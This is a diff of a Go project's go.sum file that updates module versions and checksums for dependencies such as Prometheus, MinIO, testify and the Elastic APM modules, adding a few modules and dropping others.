@@ -125,23 +125,26 @@ github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1m github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/evanphx/json-patch v5.7.0+incompatible h1:vgGkfT/9f8zE6tvSCe74nfpAVDQ2tG6yudJd8LBksgI= github.com/evanphx/json-patch v5.7.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/evanphx/json-patch/v5 v5.8.1 h1:iPEdwg0XayoS+E7Mth9JxwUtOgyVxnDTXHtKhZPlZxA= -github.com/evanphx/json-patch/v5 v5.8.1/go.mod h1:VNkHZ/282BpEyt/tObQO8s5CMPmYYq14uClGH4abBuQ= +github.com/evanphx/json-patch/v5 v5.9.0 h1:kcBlZQbplgElYIlo/n1hJbls2z/1awpXxpRi0/FOJfg= +github.com/evanphx/json-patch/v5 v5.9.0/go.mod h1:VNkHZ/282BpEyt/tObQO8s5CMPmYYq14uClGH4abBuQ= github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f h1:Wl78ApPPB2Wvf/TIe2xdyJxTlb6obmF18d8QdkxNDu4= github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f/go.mod h1:OSYXu++VVOHnXeitef/D8n/6y4QV8uLHSFXX4NeXMGc= github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM= github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE= -github.com/felixge/httpsnoop v1.0.1/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U= github.com/felixge/httpsnoop v1.0.4 h1:NFTV2Zj1bL4mc9sqWACXbQFVBBg2W3GPvqp8/ESS2Wg= github.com/felixge/httpsnoop v1.0.4/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U= -github.com/frankban/quicktest v1.14.4 h1:g2rn0vABPOOXmZUj+vbmUp0lPoXEMuhTpIluN0XL9UY= -github.com/frankban/quicktest v1.14.4/go.mod h1:4ptaffx2x8+WTWXmUCuVU6aPUX1/Mz7zb5vbUoiM6w0= -github.com/fsouza/fake-gcs-server v1.47.6 h1:/d/879q/Os9Zc5gyV3QVLfZoajN1KcWucf2zYCFeFxs= -github.com/fsouza/fake-gcs-server v1.47.6/go.mod h1:ApSXKexpG1BUXJ4f2tNCxvhTKwCPFqFLBDW2UNQDODE= +github.com/frankban/quicktest v1.14.6 h1:7Xjx+VpznH+oBnejlPUj8oUpdxnVs4f8XU8WnHkI4W8= +github.com/frankban/quicktest v1.14.6/go.mod h1:4ptaffx2x8+WTWXmUCuVU6aPUX1/Mz7zb5vbUoiM6w0= 
+github.com/fsouza/fake-gcs-server v1.48.0 h1:CBjqlg0nout6XawFtLTKfdBP65SfE2kOnQs+FIOCV/U= +github.com/fsouza/fake-gcs-server v1.48.0/go.mod h1:2F2TAO5Dttmzu8lXSyg9XG1o8lNfrMkw2m1VdVVSa00= github.com/go-errors/errors v1.4.2 h1:J6MZopCL4uSllY1OfXM374weqZFFItUbrImctkmUxIA= github.com/go-errors/errors v1.4.2/go.mod h1:sIVyrIiJhuEF+Pj9Ebtd6P/rEYROXFi3BopGUQ5a5Og= -github.com/go-logr/logr v1.3.0 h1:2y3SDp0ZXuc6/cjLSZ+Q3ir+QB9T/iG5yYRXqsagWSY= +github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= github.com/go-logr/logr v1.3.0/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= +github.com/go-logr/logr v1.4.1 h1:pKouT5E8xu9zeFC39JXRDukb6JFQPXM5p5I91188VAQ= +github.com/go-logr/logr v1.4.1/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= +github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag= +github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE= github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY= github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= github.com/go-openapi/errors v0.20.2/go.mod h1:cM//ZKUKyO06HSwqAelJ5NsEMMcpa6VpXe8DOa1Mi1M= @@ -165,7 +168,6 @@ github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= -github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= 
@@ -175,8 +177,9 @@ github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvq github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= -github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg= -github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= +github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= +github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/golang/snappy v0.0.2/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/golang/snappy v0.0.4 h1:yAGX7huGHXlcLOEtBnF4w7FQwA26wojNCwOYAEhLjQM= 
@@ -223,10 +226,10 @@ github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.2 h1:Vie5ybvEvT75RniqhfFxPRy3Bf7vr3h0cechB90XaQs= github.com/googleapis/enterprise-certificate-proxy v0.3.2/go.mod h1:VLSiSSBs/ksPL8kq3OBOQ6WRI2QnaFynd1DCjZ62+V0= -github.com/googleapis/gax-go/v2 v2.12.0 h1:A+gCJKdRfqXkr+BIRGtZLibNXf0m1f9E4HG56etFpas= -github.com/googleapis/gax-go/v2 v2.12.0/go.mod h1:y+aIqrI5eb1YGMVJfuV3185Ts/D7qKpsEkdD5+I6QGU= -github.com/gorilla/handlers v1.5.1 h1:9lRY6j8DEeeBT10CvO9hGW0gmky0BprnvDI5vfhUHH4= -github.com/gorilla/handlers v1.5.1/go.mod h1:t8XrUpc4KVXb7HGyJ4/cEnwQiaxrX/hz1Zv/4g96P1Q= +github.com/googleapis/gax-go/v2 v2.12.3 h1:5/zPPDvw8Q1SuXjrqrZslrqT7dL/uJT2CQii/cLCKqA= +github.com/googleapis/gax-go/v2 v2.12.3/go.mod h1:AKloxT6GtNbaLm8QTNSidHUVsHYcBHwWRvkNFJUQcS4= +github.com/gorilla/handlers v1.5.2 h1:cLTUSsNkgcwhgRqvCNmdbRWG0A3N4F+M2nWKdScwyEE= +github.com/gorilla/handlers v1.5.2/go.mod h1:dX+xVpaxdSw+q0Qek8SSsl3dfMk3jNddUkMzo0GtH0w= github.com/gorilla/mux v1.8.1 h1:TuBL49tXwgrFYWhqrNgrUNEY92u81SPhu7sTdzQEiWY= github.com/gorilla/mux v1.8.1/go.mod h1:AKf9I4AEqPTmMytcMc0KkNouC66V3BtZ4qD5fmWSiMQ= github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE= 
@@ -272,12 +275,12 @@ github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+o github.com/klauspost/compress v1.4.1/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.11.4/go.mod h1:aoV0uJVorq1K+umq18yTdKaF57EivdYsUV+/s2qKfXs= github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk= -github.com/klauspost/compress v1.17.0 h1:Rnbp4K9EjcDuVuHtd0dgA4qNuv9yKDYKK1ulpJwgrqM= -github.com/klauspost/compress v1.17.0/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= +github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= +github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= github.com/klauspost/cpuid v1.2.0 h1:NMpwD2G9JSFOE1/TJjGSo5zG7Yb2bTe7eq1jH+irmeE= github.com/klauspost/cpuid v1.2.0/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= -github.com/klauspost/cpuid/v2 v2.2.5 h1:0E5MSMDEoAulmXNFquVs//DdoomxaoTY1kUhbc/qbZg= -github.com/klauspost/cpuid/v2 v2.2.5/go.mod h1:Lcz8mBdAVJIBVzewtcLocK12l3Y+JytZYpaMropDUws= +github.com/klauspost/cpuid/v2 v2.2.6 h1:ndNyv040zDGIDh8thGkXYjnFtiN02M1PVVF+JE/48xc= +github.com/klauspost/cpuid/v2 v2.2.6/go.mod h1:Lcz8mBdAVJIBVzewtcLocK12l3Y+JytZYpaMropDUws= github.com/klauspost/pgzip v1.2.5 h1:qnWYvvKqedOF2ulHpMG72XQol4ILEJ8k2wwRl/Km8oE= github.com/klauspost/pgzip v1.2.5/go.mod h1:Ch1tH69qFZu15pkjo5kYi6mth2Zzwzt50oCQKQE9RUs= github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= 
@@ -308,8 +311,6 @@ github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= github.com/mattn/go-runewidth v0.0.14 h1:+xnbZSEeDbOIg5/mE6JF0w6n9duR1l3/WmbinWVwUuU= github.com/mattn/go-runewidth v0.0.14/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= -github.com/matttproud/golang_protobuf_extensions v1.0.4 h1:mmDVorXM7PCGKw94cs5zkfA9PSy5pEvNWRP0ET0TIVo= -github.com/matttproud/golang_protobuf_extensions v1.0.4/go.mod h1:BSXmuO+STAnVfrANrmjBb36TMTDstsz7MSK+HVaYKv4= github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d h1:5PJl274Y63IEHC+7izoQE9x6ikvDFZS2mDVS3drnohI= github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= @@ -317,8 +318,8 @@ github.com/mholt/archiver/v3 v3.5.1 h1:rDjOBX9JSF5BvoJGvjqK479aL70qh9DIpZCl+k7Cl github.com/mholt/archiver/v3 v3.5.1/go.mod h1:e3dqJ7H78uzsRSEACH1joayhuSyhnonssnDhppzS1L4= github.com/minio/md5-simd v1.1.2 h1:Gdi1DZK69+ZVMoNHRXJyNcxrMA4dSxoYHZSQbirFg34= github.com/minio/md5-simd v1.1.2/go.mod h1:MzdKDxYpY2BT9XQFocsiZf/NKVtR7nkE4RoEpN+20RM= -github.com/minio/minio-go/v7 v7.0.63 h1:GbZ2oCvaUdgT5640WJOpyDhhDxvknAJU2/T3yurwcbQ= -github.com/minio/minio-go/v7 v7.0.63/go.mod h1:Q6X7Qjb7WMhvG65qKf4gUgA5XaiSox74kR1uAEjxRS4= +github.com/minio/minio-go/v7 v7.0.69 h1:l8AnsQFyY1xiwa/DaQskY4NXSLA2yrGsW5iD9nRPVS0= +github.com/minio/minio-go/v7 v7.0.69/go.mod h1:XAvOPJQ5Xlzk5o3o/ArO2NMbhSGkimC+bpW/ngRKDmQ= github.com/minio/sha256-simd v1.0.1 h1:6kaan5IFmwTNynnKKpDHe6FWHohJOHhCPchzK49dzMM= github.com/minio/sha256-simd v1.0.1/go.mod h1:Pz6AKMiUdngCLpeTL/RJY1M9rUuPMYujV5xJjtbRSN8= github.com/mitchellh/copystructure v1.0.0/go.mod h1:SNtv71yrdKgLRyLFxmLdkAbkKEFWgYaq1OVrnRcwhnw= 
@@ -378,15 +379,15 @@ github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRI github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c h1:ncq/mPwQF4JjgDlrVEn3C11VoGHZN7m8qihwgMEtzYw= github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c/go.mod h1:OmDBASR4679mdNQnz2pUhc2G8CO2JrUAVFDRBDP/hJE= -github.com/prometheus/client_golang v1.17.0 h1:rl2sfwZMtSthVU752MqfjQozy7blglC+1SOtjMAMh+Q= -github.com/prometheus/client_golang v1.17.0/go.mod h1:VeL+gMmOAxkS2IqfCq0ZmHSL+LjWfWDUmp1mBz9JgUY= +github.com/prometheus/client_golang v1.19.0 h1:ygXvpU1AoN1MhdzckN+PyD9QJOSD4x7kmXYlnfbA6JU= +github.com/prometheus/client_golang v1.19.0/go.mod h1:ZRM9uEAypZakd+q/x7+gmsvXdURP+DABIEIjnmDdp+k= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= -github.com/prometheus/client_model v0.4.1-0.20230718164431-9a2bf3000d16 h1:v7DLqVdK4VrYkVD5diGdl4sxJurKJEMnODWRJlxV9oM= -github.com/prometheus/client_model v0.4.1-0.20230718164431-9a2bf3000d16/go.mod h1:oMQmHW1/JoDwqLtg57MGgP/Fb1CJEYF2imWWhWtMkYU= -github.com/prometheus/common v0.44.0 h1:+5BrQJwiBB9xsMygAB3TNvpQKOwlkc25LbISbrdOOfY= -github.com/prometheus/common v0.44.0/go.mod h1:ofAIvZbQ1e/nugmZGz4/qCb9Ap1VoSTIO7x0VV9VvuY= -github.com/prometheus/procfs v0.11.1 h1:xRC8Iq1yyca5ypa9n1EZnWZkt7dwcoRPQwX/5gwaUuI= -github.com/prometheus/procfs v0.11.1/go.mod h1:eesXgaPo1q7lBpVMoMy0ZOFTth9hBn4W/y0/p/ScXhY= +github.com/prometheus/client_model v0.5.0 h1:VQw1hfvPvk3Uv6Qf29VrPF32JB6rtbgI6cYPYQjL0Qw= +github.com/prometheus/client_model v0.5.0/go.mod h1:dTiFglRmd66nLR9Pv9f0mZi7B7fk5Pm3gvsjB5tr+kI= +github.com/prometheus/common v0.48.0 h1:QO8U2CdOzSn1BBsmXJXduaaW+dY/5QLjfB8svtSzKKE= +github.com/prometheus/common v0.48.0/go.mod h1:0/KsvlIEfPQCQ5I2iNSAWKPZziNCvRs5EC6ILDTlAPc= +github.com/prometheus/procfs v0.12.0 
h1:jluTpSng7V9hY0O2R9DzzJHYb2xULk9VTR1V1R/k6Bo= +github.com/prometheus/procfs v0.12.0/go.mod h1:pcuDEFsWDnvcgNzo4EEweacyhjeA9Zk3cnaOZAZEfOo= github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.4.3 h1:utMvzDsuh3suAEnhH0RdHmoPbU648o6CvXxTx4SBMOw= github.com/rivo/uniseg v0.4.3/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= @@ -398,8 +399,8 @@ github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= github.com/sergi/go-diff v1.2.0 h1:XU+rvMAioB0UC3q1MFrIQy4Vo5/4VsRDQQXHsEya6xQ= github.com/sergi/go-diff v1.2.0/go.mod h1:STckp+ISIX8hZLjrqAeVduY0gWCT9IjLuqbuNXdaHfM= -github.com/shirou/gopsutil/v3 v3.23.12 h1:z90NtUkp3bMtmICZKpC4+WaknU1eXtp5vtbQ11DgpE4= -github.com/shirou/gopsutil/v3 v3.23.12/go.mod h1:1FrWgea594Jp7qmjHUUPlJDTPgcsb9mGnXDxavtikzM= +github.com/shirou/gopsutil/v3 v3.24.2 h1:kcR0erMbLg5/3LcInpw0X/rrPSqq4CDPyI6A6ZRC18Y= +github.com/shirou/gopsutil/v3 v3.24.2/go.mod h1:tSg/594BcA+8UdQU2XcW803GWYgdtauFFPgJCJKZlVk= github.com/shoenig/go-m1cpu v0.1.6 h1:nxdKQNcEB6vzgA2E2bvzKIYRuNj7XNJ4S/aRSwKzFtM= github.com/shoenig/go-m1cpu v0.1.6/go.mod h1:1JJMcUBvfNwpq05QDQVAnx3gUHr9IYF7GNg9SUEw2VQ= github.com/shoenig/test v0.6.4 h1:kVTaSd7WLz5WZ2IaoM0RSzRsUD+m8wRR+5qvntpn4LU= 
@@ -407,13 +408,11 @@ github.com/shoenig/test v0.6.4/go.mod h1:byHiCGXqrVaflBLAMq/srcZIHynQPQgeyvkvXnj github.com/shopspring/decimal v1.2.0/go.mod h1:DKyhrW/HYNuLGql+MJL6WCR6knT2jwCFRcu2hWCYk4o= github.com/shopspring/decimal v1.3.1 h1:2Usl1nmF/WZucqkFZhnfFYxxxu8LG21F6nPQBE5gKV8= github.com/shopspring/decimal v1.3.1/go.mod h1:DKyhrW/HYNuLGql+MJL6WCR6knT2jwCFRcu2hWCYk4o= -github.com/sirupsen/logrus v1.9.3 h1:dueUQJ1C2q9oE3F7wvmSGAaVtTmUizReu6fjN8uqzbQ= -github.com/sirupsen/logrus v1.9.3/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ= github.com/spf13/afero v1.11.0 h1:WJQKhtpdm3v2IzqG8VMqrr6Rf3UYpEF239Jy9wNepM8= github.com/spf13/afero v1.11.0/go.mod h1:GH9Y3pIexgf1MTIWtNGyogA5MwRIDXGUr+hbWNoBjkY= github.com/spf13/cast v1.3.1/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE= -github.com/spf13/cast v1.5.1 h1:R+kOtfhWQE6TVQzY+4D7wJLBgkdVasCEFxSUBYBYIlA= -github.com/spf13/cast v1.5.1/go.mod h1:b9PdjNptOpzXr7Rq1q9gJML/2cdGQAo69NKzQ10KN48= +github.com/spf13/cast v1.6.0 h1:GEiTHELF+vaR5dhz3VqZfFSzZjYbgeKDpBxQVS4GYJ0= +github.com/spf13/cast v1.6.0/go.mod h1:ancEpBxwJDODSW/UG4rDrAqiKolqNNh2DX3mk86cAdo= github.com/spf13/cobra v1.8.0 h1:7aJaZx1B85qltLMc546zn58BxxfZdR/W22ej9CFoEf0= github.com/spf13/cobra v1.8.0/go.mod h1:WXLWApfZ71AjXPya3WOlMsY9yMs7YeiHhFVlvLyhcho= github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= 
@@ -421,8 +420,8 @@ github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= -github.com/stretchr/objx v0.5.1 h1:4VhoImhV/Bm0ToFkXFi8hXNXwpDRZ/ynw3amt82mzq0= -github.com/stretchr/objx v0.5.1/go.mod h1:/iHQpkQwBD6DLUmQ4pE+s1TXdob1mORJ4/UFdrifcy0= +github.com/stretchr/objx v0.5.2 h1:xuMeJ0Sdp5ZMRXx/aWO6RZxdr3beISkG5/G/aIRr3pY= +github.com/stretchr/objx v0.5.2/go.mod h1:FRsXN1f5AsAjCGJKqEizvkpNtU+EGNCLh3NxZ/8L+MA= github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= 
@@ -432,9 +431,9 @@ github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/ github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= -github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= -github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= +github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg= +github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= github.com/tidwall/pretty v1.0.0 h1:HsD+QiTn7sK6flMKIvNmpqz1qrpP3Ps6jOKIKMooyg4= github.com/tidwall/pretty v1.0.0/go.mod h1:XNkn88O1ChpSDQmQeStsy+sBenx6DDtFZJxhVysOjyk= github.com/tklauser/go-sysconf v0.3.12 h1:0QaGUFOdQaIVdPgfITYzaTegZvdCjmYO52cSFAEVmqU= 
@@ -463,16 +462,18 @@ github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9dec github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.0/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= -github.com/yusufpapurcu/wmi v1.2.3 h1:E1ctvB7uKFMOJw3fdOW32DwGE9I7t++CRUEMKvFoFiw= -github.com/yusufpapurcu/wmi v1.2.3/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= -go.elastic.co/apm/module/apmgorilla/v2 v2.4.7 h1:KKVofZksT6fQ6SRd78t5B2Q0s7NXcQ2na99yFZ++QLw= -go.elastic.co/apm/module/apmgorilla/v2 v2.4.7/go.mod h1:1f5MubV9IprFxjZ4Q+j/nUtomBNncE0pO43/fBkPcGo= -go.elastic.co/apm/module/apmhttp/v2 v2.4.7 h1:IL+DRK8ODO791ai/l1g/8dk6E3VPomiV0jbRIxBWbqM= -go.elastic.co/apm/module/apmhttp/v2 v2.4.7/go.mod h1:Itj4PGNVO33Tpp/9UPf4A6pCezTmADRRi/ytLAGms24= -go.elastic.co/apm/module/apmzap/v2 v2.4.7 h1:j96pvon+IhbFpzV4IflXwxOKD+l5rApyyN2ycarJG6Y= -go.elastic.co/apm/module/apmzap/v2 v2.4.7/go.mod h1:bi0A6hYYwModJI70LJDB8IHqw7291Ub16LRdEXNcOcU= -go.elastic.co/apm/v2 v2.4.7 h1:m5B2m59KgbiupuzFUkKqEvwHABIZxl2Ob0tCgc0XG9w= -go.elastic.co/apm/v2 v2.4.7/go.mod h1:+CiBUdrrAGnGCL9TNx7tQz3BrfYV23L8Ljvotoc87so= +github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo0= +github.com/yusufpapurcu/wmi v1.2.4/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= +go.einride.tech/aip v0.66.0 h1:XfV+NQX6L7EOYK11yoHHFtndeaWh3KbD9/cN/6iWEt8= +go.einride.tech/aip v0.66.0/go.mod h1:qAhMsfT7plxBX+Oy7Huol6YUvZ0ZzdUz26yZsQwfl1M= +go.elastic.co/apm/module/apmgorilla/v2 v2.5.0 h1:XeKkwqXWBEoU68AYPvFaOJYcs+c56S9sLV2wtRdwf3g= +go.elastic.co/apm/module/apmgorilla/v2 v2.5.0/go.mod h1:EORWcVUh8p3Z2d2GdoHMQs07fhkXRqV3lInehgMMnao= +go.elastic.co/apm/module/apmhttp/v2 v2.5.0 h1:4AWlw8giL7hRYBQiwF1/Thm0GDsbQH/Ofe4eySAnURo= +go.elastic.co/apm/module/apmhttp/v2 v2.5.0/go.mod 
h1:ZP7gLEzY/OAPTqNZjp8AzA06HF82zfwXEpKI2sSVTgk= +go.elastic.co/apm/module/apmzap/v2 v2.5.0 h1:COXqVte4i75XQmV+H4m4g+2JubK3Y1WRIzY/ppKa3bQ= +go.elastic.co/apm/module/apmzap/v2 v2.5.0/go.mod h1:PHKFbSROQPFZ2+X3oZyaF8lie5DhK0gtcRMpz//S54g= +go.elastic.co/apm/v2 v2.5.0 h1:UYqdu/bjcubcP9BIy5+os2ExRzw03yOQFG+sRGGhVlQ= +go.elastic.co/apm/v2 v2.5.0/go.mod h1:+CiBUdrrAGnGCL9TNx7tQz3BrfYV23L8Ljvotoc87so= go.elastic.co/ecszap v1.0.2 h1:iW5OGx8IiokiUzx/shD4AJCPFMC9uUtr7ycaiEIU++I= go.elastic.co/ecszap v1.0.2/go.mod h1:dJkSlK3BTiwG/qXhCwe50Mz/jwu854vSip8sIeQhNZg= go.elastic.co/fastjson v1.1.0 h1:3MrGBWWVIxe/xvsbpghtkFoPciPhOCmjsR/HfwEeQR4= 
